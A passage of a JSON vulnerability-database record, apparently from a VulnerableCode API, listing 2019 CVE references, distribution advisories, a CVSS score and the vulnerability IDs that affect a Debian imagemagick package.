"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730364", "reference_id": "1730364", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730364" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931453", "reference_id": "931453", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931453" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": "VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": 